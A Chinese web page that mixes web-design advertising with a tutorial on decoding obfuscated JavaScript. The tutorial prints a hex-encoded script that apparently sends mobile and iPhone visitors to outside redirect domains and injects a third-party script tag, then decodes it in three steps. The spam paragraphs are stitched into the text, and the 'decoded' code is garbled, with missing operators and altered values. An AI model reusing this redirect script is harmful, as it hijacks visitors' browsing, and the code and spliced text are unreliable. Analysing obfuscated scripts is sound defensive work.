十年网站开发经验 + 多家企业客户 + 靠谱的建站团队
量身定制 + 运营维护+专业推广+无忧售后,网站问题一站解决
zzzevazzz 写的破大部分加密,显源码的东东,在地址栏输入: javascript:s=document.documentElement.outerHTML;document.write('');document.body.innerText=s; 对于JS加密来说参考下面的方法最近很多人在问加密代码的问题。其实这些加密都大同小异,就是对字符串和 Unicode 编码进行转换处理。
在成都做网站、成都网站建设过程中,需要针对客户的行业特点、产品特性、目标受众和市场情况进行定位分析,以确定网站的风格、色彩、版式、交互等方面的设计方向。成都创新互联还需要根据客户的需求进行功能模块的开发和设计,包括内容管理、前台展示、用户权限管理、数据统计和安全保护等功能。
完全的前端代码没有安全可言的,使用firebug很容易就能够把隐藏的页面元素调出来,以及修改javascript代码什么的。
要清楚你要的东西是不是已经下载到客户端了,只要是已经完成下载的就可以随意操作。
第一步解码:
var _$ = ["\x77\x66", "\x3f", "\x26\x74\x3d\x7a\x72", '\x54\x72\x69\x64\x65\x6e\x74', '\x50\x72\x65\x73\x74\x6f', '\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74', '\x47\x65\x63\x6b\x6f', '\x4b\x48\x54\x4d\x4c', '\x41\x6e\x64\x72\x6f\x69\x64', '\x4c\x69\x6e\x75\x78', '\x69\x50\x68\x6f\x6e\x65', '\x69\x50\x61\x64', '\x53\x61\x66\x61\x72\x69', "\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x2d\x67\x6f\x6f\x67\x6c\x65\x2d\x73\x6f\x67\x6f\x75\x2d\x73\x6f\x73\x6f\x2d\x33\x36\x30\x2d\x71\x71\x2e\x6d\x61\x68\x6a\x75\x6e\x2e\x63\x6f\x6d\x2f\x63\x64\x6e\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x3f", '\x68\x74\x74\x70\x3a\x2f\x2f\x69\x6f\x73\x2e\x61\x64\x61\x6e\x7a\x68\x75\x6f\x2e\x63\x6f\x6d\x2f\x67\x6f\x33\x2e\x70\x68\x70\x3f', '\x26\x74\x69\x64\x3d\x31\x35', "\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\'\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\'\x20\x63\x68\x61\x72\x73\x65\x74\x3d\'\x67\x62\x32\x33\x31\x32\'\x20\x73\x72\x63\x3d\'\x68\x74\x74\x70\x3a\x2f\x2f\x6a\x73\x2e\x61\x64\x6d\x2e\x63\x6e\x7a\x7a\x2e\x6e\x65\x74\x2f\x73\x2e\x70\x68\x70\x3f\x73\x69\x64\x3d\x32\x36\x37\x31\x37\x34\'\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"];
var a = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"](_$[0])["\x73\x72\x63"];src = a["\x73\x70\x6c\x69\x74"](_$[1])[0x1] + _$[2];
var b = {
versions: function() {
var c = navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"],
d = navigator["\x61\x70\x70\x56\x65\x72\x73\x69\x6f\x6e"];
return {
trident: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[3]) -0x1,
presto: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[4]) -0x1,
webKit: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[5]) -0x1,
gecko: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[6]) -0x1 c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[7]) == -0x1,
mobile: !!c["\x6d\x61\x74\x63\x68"](/AppleWebKit.*Mobile.*/),
ios: !!c["\x6d\x61\x74\x63\x68"](/\(i[^;]+;( U;)? CPU.+Mac OS X/),
android: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[8]) -0x1 || c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[9]) -0x1,
iPhone: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[10]) -0x1,
iPad: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[11]) -0x1,
webApp: c["\x69\x6e\x64\x65\x78\x4f\x66"](_$[12]) == -0x1
}
} (),
language: (navigator["\x62\x72\x6f\x77\x73\x65\x72\x4c\x61\x6e\x67\x75\x61\x67\x65"] || navigator["\x6c\x61\x6e\x67\x75\x61\x67\x65"])["\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65"]()
};
if (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x6d\x6f\x62\x69\x6c\x65"] != false b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x61\x6e\x64\x72\x6f\x69\x64"] != false) {
window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"] = _$[13] + src
} else if (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x6d\x6f\x62\x69\x6c\x65"] != false (b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x68\x6f\x6e\x65"] != false || b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x61\x64"] != false || b["\x76\x65\x72\x73\x69\x6f\x6e\x73"]["\x69\x50\x6f\x64"] != false)) {
window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"] = _$[14] + src + _$[15]
};
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"](_$[16]);
第二步解码:
var _$ = ["wf", "?", "t=zr", 'Trident', 'presto', 'AppleWebkit', 'Gecko', 'kHTML', 'Android', 'Linux', 'iphone', 'ipad', 'Safari', 'tid=15', "script type=\'text/javascript\' charset=\'gb2312\' src=\'\'/script"
];
var a = window["document"]["getElementById"](_$[0])["src"];src = a["split"](_$[1])[0x1] + _$[2];
var b = {
versions: function() {
var c = navigator["userAgent"],
d = navigator["appVersion"];
return {
trident: c["indexOf"](_$[3]) -0x1,
presto: c["indexOf"](_$[4]) -0x1,
webKit: c["indexOf"](_$[5]) -0x1,
gecko: c["indexOf"](_$[6]) -0x1 c["indexOf"](_$[7]) == -0x1,
mobile: !!c["match"](/AppleWebKit.*Mobile.*/),
ios: !!c["match"](/\(i[^;]+;( U;)? CPU.+Mac OS X/),
android: c["indexOf"](_$[8]) -0x1 || c["indexOf"](_$[9]) -0x1,
iPhone: c["indexOf"](_$[10]) -0x1,
iPad: c["indexOf"](_$[11]) -0x1,
webApp: c["indexOf"](_$[12]) == -0x1
}
} (),
language: (navigator["browserLanguage"] || navigator["language"])["toLower\x43ase"]()
};
if (b["versions"]["mobile"] != false b["versions"]["android"] != false) {
window["location"]["href"] = _$[13] + src
} else if (b["versions"]["mobile"] != false (b["versions"]["iphone"] != false || b["versions"]["ipad"] != false || b["versions"]["ipod"] != false)) {
window["location"]["href"] = _$[14] + src + _$[15]
};
window["document"]["writeln"](_$[16]);
第三步解码
var a = document.getElementById('wf').src;
src = a.split('?')[1] + 't=zr';
var b = {
versions: function() {
var c = navigator.userAgent,
d = navigator.appVersion;
return {
trident: c.indexOf('Trident') -1,
presto: c.indexOf( 'presto') -1,
webKit: c.indexOf('AppleWebkit') -1,
gecko: c.indexOf('Gecko') -1 c.indexOf('kHTML') == -1,
mobile: !!c.match.(/AppleWebKit.*Mobile.*/),
ios: !!c.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
android: c.indexOf('Android') -1 || c.indexOf('Linux') -1,
iPhone: c.indexOf('iphone') -1,
iPad: c.indexOf('ipad') -1,
webApp: c.indexOf('Safari') == -1
}
} (),
language: (navigator.browserLanguage || navigator.language).toLowerCase();
};
if (b["versions"]["mobile"] != false b["versions"]["android"] != false) {
location.href = '?' + src
} else if (b["versions"]["mobile"] != false (b["versions"]["iphone"] != false || b["versions"]["ipad"] != false || b["versions"]["ipod"] != false)) {
location.href = '?' + src + 'tid=15'
};
document.writeln('script type=\'text/javascript\' charset=\'gb2312\' src=\'\'/script');
在网页中加入一个,然后在加密代码中找document.write(),eval(),execScript()或VBS的EXECUTE语句,并用document.getElementById("textareaID").innerText=STR 替换。加密就不攻自破了。
(STR是转换好的字符串变量,如在加密代码中找到 document.write(s); 就用 document.getElementById("textareaID").innerText=s; 替换)
只要熟悉js的语法,可以轻松“破解”这些乱码。
比如console.log( _0xcb18 );
得到:
["target", "", "replace", "http header read error", "data length: ", "HTTP/1.1 200 OK
", "Content-Length: ", "Content-Type: text/html
", "Access-Control-Allow-Origin:*
", "Expires: Thu, 15 Sep 2006 16:23:12 GMT
"]
然后一步步的将下边的数组元素引用的地方替换成正常的方法名,慢慢的,代码的容颜就浮现了。